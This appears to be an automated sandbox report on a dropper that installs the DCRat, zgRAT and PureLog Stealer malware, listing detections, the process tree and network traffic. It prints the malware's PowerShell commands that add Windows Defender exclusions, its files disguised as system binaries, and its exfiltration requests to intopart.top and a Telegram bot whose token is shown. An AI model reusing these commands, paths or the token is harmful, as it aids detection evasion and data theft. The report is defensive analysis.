Edit tour

Windows Analysis Report
Vqzx4PFehn.exe

Overview

General Information

Sample name:	Vqzx4PFehn.exe renamed because original name is a hash value
Original sample name:	1925339cab9e6a65f43c5f04321156e2.exe
Analysis ID:	1433033
MD5:	1925339cab9e6a65f43c5f04321156e2
SHA1:	16fc99e39d5dd91b915da5ffb969f56597d54c06
SHA256:	fb2e3a0d29ae08e964de8bcc1cf986b3a6b928d13e14368cc31535236afd024e
Tags:	DCRatexe
Infos:

Detection

DCRat, PureLog Stealer, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected DCRat

Yara detected PureLog Stealer

Yara detected zgRAT

Adds a directory exclusion to Windows Defender

Drops PE files with benign system names

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Sigma detected: Execution from Suspicious Folder

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Suspicious Program Location with Network Connections

Suspicious execution chain found

Tries to harvest and steal browser information (history, passwords, etc)

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Uses the Telegram API (likely for C&C communication)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Creates files inside the system directory

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

File is packed with WinRar

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains sections with non-standard names

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Powershell Defender Exclusion

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

Vqzx4PFehn.exe (PID: 7100 cmdline: "C:\Users\user\Desktop\Vqzx4PFehn.exe" MD5: 1925339CAB9E6A65F43C5F04321156E2)

wscript.exe (PID: 6400 cmdline: "C:\Windows\System32\WScript.exe" "C:\portintosvc\X5ZTZfC.vbe" MD5: FF00E0480075B095948000BDC66E81F0)

cmd.exe (PID: 5844 cmdline: C:\Windows\system32\cmd.exe /c ""C:\portintosvc\6iyrEfS0qZMUeKUvqyCENK8F6bD2a9LOXf0Mm.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

driverInto.exe (PID: 5936 cmdline: "C:\portintosvc/driverInto.exe" MD5: 31594886C067C61C60A04365C0E2A58C)

powershell.exe (PID: 6532 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\XXPWErhsUbDrk.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 3484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6024 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 1068 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\My Documents\My Pictures\XXPWErhsUbDrk.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7884 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

powershell.exe (PID: 3052 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows defender\services.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 3196 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Registration\csrss.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 1396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 3848 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\portintosvc\driverInto.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 2312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7280 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\28moAYly7n.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 7504 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 7596 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

XXPWErhsUbDrk.exe (PID: 8064 cmdline: "C:\Users\Default User\My Documents\My Pictures\XXPWErhsUbDrk.exe" MD5: 31594886C067C61C60A04365C0E2A58C)

svchost.exe (PID: 6244 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Yara Signatures

Dropped Files

Source	Rule	Description	Author
C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files (x86)\Windows Defender\services.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Program Files (x86)\Windows Defender\services.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\portintosvc\driverInto.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\portintosvc\driverInto.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Windows\Registration\csrss.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Windows\Registration\csrss.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 7 entries

Memory Dumps

Source	Rule	Description	Author
00000004.00000000.1783939727.0000000000AC2000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000003.1622104471.0000000006DE3000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000004.00000002.1932393224.0000000013164000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: driverInto.exe PID: 5936	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
4.0.driverInto.exe.ac0000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
4.0.driverInto.exe.ac0000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Sigma Signatures

System Summary

Sigma detected: Execution from Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Default User\My Documents\My Pictures\XXPWErhsUbDrk.exe" , CommandLine: "C:\Users\Default User\My Documents\My Pictures\XXPWErhsUbDrk.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe, NewProcessName: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe, OriginalFileName: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\28moAYly7n.bat" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7280, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Users\Default User\My Documents\My Pictures\XXPWErhsUbDrk.exe" , ProcessId: 8064, ProcessName: XXPWErhsUbDrk.exe

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\portintosvc\driverInto.exe, ProcessId: 5936, TargetFilename: C:\Windows\Registration\csrss.exe

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\XXPWErhsUbDrk.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\XXPWErhsUbDrk.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\portintosvc/driverInto.exe", ParentImage: C:\portintosvc\driverInto.exe, ParentProcessId: 5936, ParentProcessName: driverInto.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\XXPWErhsUbDrk.exe', ProcessId: 6532, ProcessName: powershell.exe

Sigma detected: Suspicious Program Location with Network Connections

Source: Network Connection

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 172.67.144.153, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe, Initiated: true, ProcessId: 8064, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49739

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\portintosvc\X5ZTZfC.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\portintosvc\X5ZTZfC.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\Vqzx4PFehn.exe", ParentImage: C:\Users\user\Desktop\Vqzx4PFehn.exe, ParentProcessId: 7100, ParentProcessName: Vqzx4PFehn.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\portintosvc\X5ZTZfC.vbe" , ProcessId: 6400, ProcessName: wscript.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\XXPWErhsUbDrk.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\XXPWErhsUbDrk.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\portintosvc/driverInto.exe", ParentImage: C:\portintosvc\driverInto.exe, ParentProcessId: 5936, ParentProcessName: driverInto.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\XXPWErhsUbDrk.exe', ProcessId: 6532, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6244, ProcessName: svchost.exe

Snort Signatures

ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) - Source IP: 192.168.2.4 - Destination IP: 172.67.144.153

Timestamp:	04/29/24-01:02:33.169429
SID:	2048095
Source Port:	49739
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://pesterbdd.com/images/Pester.png

URL Reputation: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\Desktop\uCFUtfTN.log	Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Users\user\Desktop\fJkHwTWu.log	Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files (x86)\Windows Defender\services.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\nntxgNlb.log	Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\EqkKdrOv.log	Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\28moAYly7n.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Windows\Registration\csrss.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342

Multi AV Scanner detection for dropped file

Source: C:\Program Files (x86)\Windows Defender\services.exe	ReversingLabs: Detection: 83%
Source: C:\Program Files (x86)\Windows Defender\services.exe	Virustotal: Detection: 65%	Perma Link
Source: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe	ReversingLabs: Detection: 83%
Source: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe	Virustotal: Detection: 65%	Perma Link
Source: C:\Recovery\XXPWErhsUbDrk.exe	ReversingLabs: Detection: 83%
Source: C:\Recovery\XXPWErhsUbDrk.exe	Virustotal: Detection: 65%	Perma Link
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	ReversingLabs: Detection: 83%
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Virustotal: Detection: 65%	Perma Link
Source: C:\Users\user\Desktop\DtICHrzA.log	Virustotal: Detection: 25%	Perma Link
Source: C:\Users\user\Desktop\EqkKdrOv.log	ReversingLabs: Detection: 66%
Source: C:\Users\user\Desktop\EqkKdrOv.log	Virustotal: Detection: 69%	Perma Link
Source: C:\Users\user\Desktop\SHKzphsQ.log	Virustotal: Detection: 9%	Perma Link
Source: C:\Users\user\Desktop\TQvqMYlM.log	Virustotal: Detection: 9%	Perma Link
Source: C:\Users\user\Desktop\fJkHwTWu.log	Virustotal: Detection: 19%	Perma Link
Source: C:\Users\user\Desktop\mqRpKNWg.log	Virustotal: Detection: 25%	Perma Link
Source: C:\Users\user\Desktop\nntxgNlb.log	ReversingLabs: Detection: 66%
Source: C:\Users\user\Desktop\nntxgNlb.log	Virustotal: Detection: 69%	Perma Link
Source: C:\Users\user\Desktop\uCFUtfTN.log	Virustotal: Detection: 19%	Perma Link
Source: C:\Windows\Registration\csrss.exe	ReversingLabs: Detection: 83%
Source: C:\Windows\Registration\csrss.exe	Virustotal: Detection: 65%	Perma Link
Source: C:\portintosvc\driverInto.exe	ReversingLabs: Detection: 83%
Source: C:\portintosvc\driverInto.exe	Virustotal: Detection: 65%	Perma Link

Multi AV Scanner detection for submitted file

Source: Vqzx4PFehn.exe	ReversingLabs: Detection: 60%
Source: Vqzx4PFehn.exe	Virustotal: Detection: 70%			Perma Link

Machine Learning detection for dropped file

Source: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Windows Defender\services.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\TQvqMYlM.log	Joe Sandbox ML: detected
Source: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe	Joe Sandbox ML: detected
Source: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\SHKzphsQ.log	Joe Sandbox ML: detected
Source: C:\Windows\Registration\csrss.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Vqzx4PFehn.exe

Joe Sandbox ML: detected

Source: Vqzx4PFehn.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\portintosvc\driverInto.exe	Directory created: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe			Jump to behavior
Source: C:\portintosvc\driverInto.exe	Directory created: C:\Program Files\Windows Security\BrowserCore\en-US\931b00cae9730a			Jump to behavior

Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49770 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49773 version: TLS 1.2

Source: Vqzx4PFehn.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:

Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: Vqzx4PFehn.exe

Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Code function: 0_2_0100A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,		0_2_0100A69B
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Code function: 0_2_0101C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,		0_2_0101C220

Source: C:\portintosvc\driverInto.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\portintosvc\driverInto.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\portintosvc\driverInto.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\portintosvc\driverInto.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\portintosvc\driverInto.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\portintosvc\driverInto.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\SysWOW64\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49739 -> 172.67.144.153:80

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.io
Source: global traffic	HTTP traffic detected: POST /bot7126538506:AAGUzEDEgn6X6JiRyzOOTz-UryNJDm6IzOs/sendPhoto HTTP/1.1Content-Type: multipart/form-data; boundary="f4f047d2-73f9-4a98-88b4-47c11c582381"Host: api.telegram.orgContent-Length: 98854Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.io
Source: global traffic	HTTP traffic detected: POST /bot7126538506:AAGUzEDEgn6X6JiRyzOOTz-UryNJDm6IzOs/sendPhoto HTTP/1.1Content-Type: multipart/form-data; boundary="e318265f-a5ec-49e0-abbc-3a95e0368c35"Host: api.telegram.orgContent-Length: 98799Expect: 100-continueConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 34.117.186.192 34.117.186.192
Source: Joe Sandbox View	IP Address: 34.117.186.192 34.117.186.192
Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: ipinfo.io
Source: unknown	DNS query: name: ipinfo.io
Source: unknown	DNS query: name: ipinfo.io
Source: unknown	DNS query: name: ipinfo.io

Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 384Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1788Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1788Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1788Expect: 100-continueConnection: Keep-Alive
